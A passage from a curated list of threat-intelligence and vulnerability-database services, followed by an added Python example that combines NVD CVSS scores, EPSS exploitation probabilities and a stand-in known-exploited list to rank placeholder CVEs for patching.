| MultiRBL | IP check for sending Mailservers. | No | 2025-01-16 |
| Onyphe | Search engine for open-source and cyber threat intelligence data collected by crawling various Internet sources or by listening to Internet background noise, correlated with data from active Internet scanning for connected devices. | No | 2025-01-16 |
| Robtex | Gathers public information about IP addresses, domain names, hostnames, autonomous systems, routes, etc. | No | 2025-01-16 |
| SSL Blacklist | List of "bad" SSL certificates identified by abuse.ch to be associated with malware or botnet activities. | No | 2025-01-16 |
| ScreenshotMachine | Online tool that creates screenshots of websites in a safe way. | No | 2025-01-16 |
| Shodan | The world's first search engine for Internet-connected devices. | No | 2025-01-16 |
| ThreatMiner | Free analysis from data collection and provide intelligence analysis. | No | 2025-01-16 |
| URLVoid | Analyze a website through multiple blacklist engines and online reputation tools. | No | 2025-01-16 |
| URLscan.io | Analyzes websites and the resources they request, letting you inspect the individual resources (scripts, images, redirects) fetched when a site is visited. | No | 2025-01-16 |
| VirusTotal | Compare URL categorization from multiple URL filtering solutions vendors. | No | 2025-01-16 |
| ZoomEye | Cyberspace Search Engine recording information of devices, websites, services and components, etc. | No | 2025-01-16 |

## Vulnerabilities

| Link | Description | Account required | Last date verified |
|---|---|---|---|
| CVE2EPSS | Looks up the EPSS (Exploit Prediction Scoring System) score for a given CVE ID. | No | 2025-05-27 |
| CVEdetails.com | CVEdetails.com offers a complete CVE database enhanced with additional information including advisories, exploits, tools, source code changes and much more. | No | 2025-01-16 |
| Exploit Database | Archive of Exploits, Shellcode and security papers. | No | 2025-01-16 |
| National Vulnerability Database (NVD) | A collection of vulnerability data that helps security professionals identify and fix cyber threats. The NVD is maintained by the National Institute of Standards and Technology (NIST). | No | 2025-01-16 |
| The Open Cloud Vulnerability & Security Issue Database | An open project to list all known cloud vulnerabilities and CSP security issues. | No | 2025-01-16 |
| VulDB | Worldwide vulnerability database with more than 111,000 entries. | No | 2025-01-16 |
| Vulmon | Vulmon is a vulnerability search engine with vulnerability intelligence features. Vulmon conducts full text search in its database; therefore, you can search everything related to vulnerabilities. It includes CVE ID, vulnerability types, vendors, products, exploits, operating systems and anything else related to vulnerabilities. | No | 2025-01-16 |
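The NVD gives severity (CVSS) and CVE2EPSS gives exploitation likelihood (EPSS); neither alone tells you what to patch first. The following is an added example, not code from NVD, FIRST, CVE2EPSS or any listed site, that joins the two and ranks findings. The payloads are constructed with placeholder IDs (`CVE-0000-xxxx`) and mirror the shape assumed here for the NVD 2.0 API (`vulnerabilities[].cve.metrics.cvssMetricV31[].cvssData.baseScore`) and the FIRST EPSS API (`data[].{cve,epss,percentile}`); `KEV_SAMPLE` stands in for the CISA Known Exploited Vulnerabilities list, and the tiering thresholds in `tier()` are an assumed policy.

```python
"""Join NVD CVSS data with EPSS scores to rank what to patch first.

Added example, not code from NVD, CVE2EPSS or any listed site. The payloads
are constructed with placeholder IDs (CVE-0000-xxxx); they mirror the shape
assumed here for the NVD 2.0 API and the FIRST EPSS API, and KEV_SAMPLE is a
stand-in for the CISA KEV catalogue. The tiering policy in tier() is an
assumption for illustration.
"""
import json

NVD_SAMPLE = json.dumps({"vulnerabilities": [
    {"cve": {"id": "CVE-0000-1001", "metrics": {"cvssMetricV31": [
        {"cvssData": {"baseScore": 9.8, "baseSeverity": "CRITICAL"}}]}}},
    {"cve": {"id": "CVE-0000-1002", "metrics": {"cvssMetricV31": [
        {"cvssData": {"baseScore": 7.5, "baseSeverity": "HIGH"}}]}}},
    {"cve": {"id": "CVE-0000-1003", "metrics": {"cvssMetricV2": [
        {"cvssData": {"baseScore": 4.3}}]}}},
    {"cve": {"id": "CVE-0000-1004", "metrics": {}}},  # e.g. awaiting analysis
]})

EPSS_SAMPLE = json.dumps({"data": [
    {"cve": "CVE-0000-1001", "epss": "0.020", "percentile": "0.880"},
    {"cve": "CVE-0000-1002", "epss": "0.710", "percentile": "0.980"},
    {"cve": "CVE-0000-1003", "epss": "0.001", "percentile": "0.300"},
]})

KEV_SAMPLE = {"CVE-0000-1003"}  # constructed stand-in for the CISA KEV catalogue

TIER_ORDER = {"act-now": 0, "schedule": 1, "backlog": 2, "no-data": 3}


def tier(cvss, epss, in_kev):
    """Assumed policy: known-exploited or likely-exploited high-severity first."""
    if in_kev or (epss is not None and epss >= 0.1 and (cvss or 0.0) >= 7.0):
        return "act-now"
    if cvss is None and epss is None:
        return "no-data"
    if (cvss or 0.0) >= 7.0 or (epss or 0.0) >= 0.01:
        return "schedule"
    return "backlog"


def cvss_base(cve):
    """Prefer CVSS v3.1, then v3.0, then v2; None when the record has no metrics."""
    metrics = cve.get("metrics", {})
    for key in ("cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
        for entry in metrics.get(key, []):
            return float(entry["cvssData"]["baseScore"])
    return None


def load_epss(epss_json):
    """EPSS values arrive as strings; map CVE -> (probability, percentile)."""
    return {row["cve"]: (float(row["epss"]), float(row["percentile"]))
            for row in json.loads(epss_json)["data"]}


def triage(nvd_json, epss_json, kev):
    """Return one row per CVE, ordered by tier, then EPSS, then CVSS."""
    epss = load_epss(epss_json)
    rows = []
    for item in json.loads(nvd_json)["vulnerabilities"]:
        cve = item["cve"]
        cid = cve["id"]
        score = cvss_base(cve)
        prob, _pct = epss.get(cid, (None, None))
        rows.append({"cve": cid, "cvss": score, "epss": prob,
                     "kev": cid in kev, "tier": tier(score, prob, cid in kev)})
    rows.sort(key=lambda r: (TIER_ORDER[r["tier"]], -(r["epss"] or 0.0), -(r["cvss"] or 0.0)))
    return rows


if __name__ == "__main__":
    for row in triage(NVD_SAMPLE, EPSS_SAMPLE, KEV_SAMPLE):
        print(f'{row["tier"]:9} {row["cve"]}  cvss={row["cvss"]}  epss={row["epss"]}  kev={row["kev"]}')
```

The sample is chosen to show the two cases a CVSS-only sort gets wrong: the 9.8 with a 2% EPSS lands behind the 7.5 that is actively being exploited, and the medium-severity CVE in KEV jumps to the front regardless of score. Records with no metrics yet (common for freshly published CVEs) are kept visible in a `no-data` tier rather than silently sorted to the bottom.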